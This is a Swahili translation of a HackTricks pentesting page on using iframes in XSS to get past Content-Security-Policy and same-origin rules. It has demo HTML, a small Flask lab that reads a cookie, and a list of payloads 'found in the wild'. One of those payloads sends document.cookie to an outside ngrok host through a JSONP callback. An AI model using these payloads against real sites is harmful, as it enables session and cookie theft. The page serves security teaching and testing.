Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md
Translator workflow 54a7bb5de7 Translated to Swahili
2024-02-11 02:13:58 +00:00

165 lines
9 KiB
Markdown
Raw Blame History

# Iframes katika XSS, CSP na SOP
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuatilie** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Iframes katika XSS
Kuna njia 3 za kuonyesha maudhui ya ukurasa ulio na iframe:
* Kupitia `src` kuonyesha URL (URL inaweza kuwa ya asili tofauti au ya asili sawa)
* Kupitia `src` kuonyesha maudhui kwa kutumia itifaki ya `data:`
* Kupitia `srcdoc` kuonyesha maudhui
**Kupata Var za Wazazi na Watoto**
```html
<html>
<script>
var secret = "31337s3cr37t";
</script>
<iframe id="if1" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if2" src="child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
<script>
function access_children_vars(){
alert(if1.secret);
alert(if2.secret);
alert(if3.secret);
alert(if4.secret);
}
setTimeout(access_children_vars, 3000);
</script>
</html>
```
```html
<!-- content of child.html -->
<script>
var secret="child secret";
alert(parent.secret)
</script>
```
Ikiwa unafikia html iliyotangulia kupitia seva ya http (kama `python3 -m http.server`) utaona kuwa hati zote zitatekelezwa (kwa kuwa hakuna CSP inayozuia hilo)., **mzazi hataweza kupata ufikivu wa `secret` ndani ya kisanduku cha iframe** na **iframes if2 & if3 (ambazo zinachukuliwa kuwa ni tovuti moja) tu ndizo zinaweza kupata ufikivu wa siri** kwenye dirisha asili.\
Tafadhali kumbuka jinsi if4 inachukuliwa kuwa na asili ya `null`.
### Iframes na CSP <a href="#iframes_with_csp_40" id="iframes_with_csp_40"></a>
{% hint style="info" %}
Tafadhali, kumbuka jinsi katika kizuizi zifuatazo majibu kwa ukurasa uliofungwa hayana kichwa cha CSP kinachozuia utekelezaji wa JS.
{% endhint %}
Thamani ya `self` ya `script-src` haitaruhusu utekelezaji wa nambari ya JS kwa kutumia itifaki ya `data:` au sifa ya `srcdoc`.\
Hata hivyo, hata thamani ya `none` ya CSP itaruhusu utekelezaji wa iframes ambazo zinaingiza URL (kamili au tu njia) kwenye sifa ya `src`.\
Kwa hiyo ni rahisi kuzungusha CSP ya ukurasa na:
```html
<html>
<head>
<meta http-equiv="Content-Security-Policy" content="script-src 'sha256-iF/bMbiFXal+AAl9tF8N6+KagNWdMlnhLqWkjAocLsk='">
</head>
<script>
var secret = "31337s3cr37t";
</script>
<iframe id="if1" src="child.html"></iframe>
<iframe id="if2" src="http://127.0.1.1:8000/child.html"></iframe>
<iframe id="if3" srcdoc="<script>var secret='if3 secret!'; alert(parent.secret)</script>"></iframe>
<iframe id="if4" src="data:text/html;charset=utf-8,%3Cscript%3Evar%20secret='if4%20secret!';alert(parent.secret)%3C%2Fscript%3E"></iframe>
</html>
```
Angalia jinsi **CSP iliyopita inaruhusu utekelezaji wa skripti ya ndani tu**.\
Walakini, **skripti za `if1` na `if2` tu zitatekelezwa lakini `if1` tu itaweza kupata siri ya mzazi**.
![](<../../.gitbook/assets/image (627) (1) (1).png>)
Kwa hivyo, ni **inawezekana kukiuka CSP ikiwa unaweza kupakia faili ya JS kwenye seva na kuipakia kupitia iframe hata na `script-src 'none'`**. Hii inaweza **pia kufanywa kwa kutumia mwisho wa JSONP wa tovuti ile ile**.
Unaweza kujaribu hii na mazingira yafuatayo ambapo kuki inaibiwa hata na `script-src 'none'`. Chukua programu na ufikie kupitia kivinjari chako:
```python
import flask
from flask import Flask
app = Flask(__name__)
@app.route("/")
def index():
resp = flask.Response('<html><iframe id="if1" src="cookie_s.html"></iframe></html>')
resp.headers['Content-Security-Policy'] = "script-src 'self'"
resp.headers['Set-Cookie'] = 'secret=THISISMYSECRET'
return resp
@app.route("/cookie_s.html")
def cookie_s():
return "<script>alert(document.cookie)</script>"
if __name__ == "__main__":
app.run()
```
### Malipo mengine yaliyopatikana porini <a href="#other_payloads_found_on_the_wild_64" id="other_payloads_found_on_the_wild_64"></a>
```html
<!-- This one requires the data: scheme to be allowed -->
<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>
<!-- This one injects JS in a jsonp endppoint -->
<iframe srcdoc='<script src="/jsonp?callback=(function(){window.top.location.href=`http://f6a81b32f7f7.ngrok.io/cooookie`%2bdocument.cookie;})();//"></script>
<!-- sometimes it can be achieved using defer& async attributes of script within iframe (most of the time in new browser due to SOP it fails but who knows when you are lucky?)-->
<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>
```
### Iframe sandbox
Maudhui ndani ya iframe inaweza kuwekewa vizuizi zaidi kwa kutumia sifa ya `sandbox`. Kwa chaguo-msingi, sifa hii haitekelezwi, maana hakuna vizuizi vilivyowekwa.
Inapotumiwa, sifa ya `sandbox` inaweka vizuizi vifuatavyo:
- Maudhui yanachukuliwa kama yanatoka kwenye chanzo kimoja tu.
- Jaribio lolote la kuwasilisha fomu linazuiliwa.
- Utekelezaji wa script unakatazwa.
- Upatikanaji wa API fulani unafungwa.
- Inazuia viungo kutoka kuingiliana na muktadha mwingine wa kivinjari.
- Matumizi ya programu-jalizi kupitia vitambulisho kama vile `<embed>`, `<object>`, `<applet>`, au vitambulisho vingine vinavyofanana haviruhusiwi.
- Uvigezo wa muktadha wa kivinjari wa kiwango cha juu wa maudhui na maudhui yenyewe unazuiliwa.
- Vipengele ambavyo huanzishwa moja kwa moja, kama vile kucheza video au kufanya fomu zifanye kazi kiotomatiki, vinazuiliwa.
Thamani ya sifa inaweza kuachwa tupu (`sandbox=""`) ili kuweka vizuizi vyote vilivyotajwa hapo juu. Vinginevyo, inaweza kuwekwa kama orodha ya nafasi zilizotenganishwa na nafasi za thamani maalum ambazo zinaondoa iframe kutoka kwa vizuizi fulani.
```html
<iframe src="demo_iframe_sandbox.htm" sandbox></iframe>
```
## Iframes katika SOP
Angalia kurasa zifuatazo:
{% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md" %}
[bypassing-sop-with-iframes-1.md](../postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md)
{% endcontent-ref %}
{% content-ref url="../postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md" %}
[bypassing-sop-with-iframes-2.md](../postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md)
{% endcontent-ref %}
{% content-ref url="../postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md" %}
[blocking-main-page-to-steal-postmessage.md](../postmessage-vulnerabilities/blocking-main-page-to-steal-postmessage.md)
{% endcontent-ref %}
{% content-ref url="../postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](../postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md)
{% endcontent-ref %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
Reference in a new issue View git blame Copy permalink